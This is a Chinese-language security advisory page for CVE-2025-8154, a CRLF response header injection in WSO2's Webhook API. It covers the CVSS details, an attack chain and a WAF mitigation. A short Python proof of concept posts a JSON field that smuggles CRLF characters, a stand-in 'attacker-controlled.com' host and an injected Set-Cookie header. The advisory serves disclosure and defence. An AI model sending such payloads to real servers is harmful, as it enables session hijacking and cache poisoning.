CVE-2025-8154 CVSS 5.3 中危

CVE-2025-8154 WSO2 Webhook响应头注入漏洞

披露日期: 2026-05-11

来源: ed10eef1-636d-4fbe-9993-6890dfa878f8

漏洞信息

漏洞编号

CVE-2025-8154

漏洞类型

HTTP响应头注入

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WSO2相关产品

漏洞概述

该漏洞源于Webhook API组件在处理用户提供的HTTP请求头时缺乏充分的验证和清理。攻击者可借此将恶意头注入到HTTP响应中，导致浏览器缓存被操纵、安全头被篡改，甚至注入敏感Cookie值，从而引发会话劫持等安全风险。

技术细节

漏洞原理是典型的HTTP响应头注入（CRLF注入）。攻击者利用Webhook API未正确过滤CRLF控制字符（\r\n）的缺陷，在输入字段中插入恶意构造的头部数据。当服务器将该输入直接拼接到HTTP响应流中时，攻击者可以注入如Set-Cookie、Location或Content-Security-Policy等头部。由于CVSS向量显示无需认证（PR:N）且无需交互（UI:N），攻击者可远程发起攻击，通过覆盖关键响应头破坏应用完整性或窃取用户会话。

攻击链分析

STEP 1

侦察

攻击者识别目标WSO2实例上暴露的Webhook API调用端点。

STEP 2

构造Payload

攻击者创建包含CRLF字符（%0d%0a）和恶意HTTP头部的JSON数据，旨在覆盖响应头或注入敏感信息。

STEP 3

注入攻击

攻击者向Webhook API发送特制的恶意请求，未经过滤的输入被直接拼接到服务器的HTTP响应中。

STEP 4

利用与影响

客户端接收到被篡改的HTTP响应，可能导致缓存投毒、安全策略绕过或Cookie被篡改，进而导致会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for HTTP Header Injection via Webhook
import requests

target_url = "https://target-wso2-server/api/webhook/invoke"
payload = {
    "url": "http://attacker-controlled.com\r\nX-Injected-Header: True\r\nSet-Cookie: sessionid=stolen_value"
}

response = requests.post(target_url, json=payload)
print("Response Status:", response.status_code)
# Check if malicious headers are reflected in the response
print("Response Headers:", response.headers)

影响范围

WSO2 Identity Server (具体版本请参考WSO2-2025-4410通告)

WSO2 API Manager (具体版本请参考WSO2-2025-4410通告)

防御指南

临时缓解措施

在应用网关处部署WAF规则，检测并拦截包含换行符（\r\n）的请求参数；临时禁用非必要的Webhook API功能，直至完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表